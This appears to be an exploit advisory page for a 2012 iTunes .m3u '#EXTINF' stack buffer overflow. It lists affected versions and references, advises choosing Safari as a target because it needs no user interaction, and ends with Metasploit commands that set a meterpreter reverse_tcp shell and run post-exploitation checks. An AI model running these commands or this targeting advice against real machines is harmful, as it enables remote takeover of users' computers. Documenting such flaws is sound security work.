Timeline :

Vulnerability fixed, without notice of the vulnerability, in product the 2012-06-11
Vulnerability discovered by Rh0
Public release of the vulnerability the 2012-06-20
Metasploit PoC provided the 2012-06-20

PoC provided by :

Rh0
sinn3r

Reference(s) :

EDB-ID-19322
HT5318
OSVDB-83220
Rh0

Affected version(s) :

iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.69 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.70 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.71 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.72 on XP SP3

Tested on Windows XP Pro SP3 with :

Apple iTunes 10.6.1.7
Apple QuickTime 7.72.80.56

Description :

This module exploits a stack buffer overflow in iTunes 10.4.0.80 to 10.6.1.7. When opening an extended .m3u file containing an “#EXTINF:” tag description, iTunes will copy the content after “#EXTINF:” without appropriate checking from a heap buffer to a stack buffer, writing beyond the stack buffer’s boundary, which allows code execution under the context of the user. Please note before using this exploit, you must have precise knowledge of the victim machine’s QuickTime version (if installed), and then select your target accordingly. In addition, even though this exploit can be used as remote, you should be aware the victim’s browser behavior when opening an itms link. For example, IE/Firefox/Opera by default will ask the user for permission before launching the itms link by iTunes. Chrome will ask for permission, but also spits a warning. Safari would be an ideal target, because it will open the link without any user interaction.

Commands :

use exploit/windows/misc/itunes_extm3u_bof
set SRVHOST 192.168.178.100
set TARGET 3
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid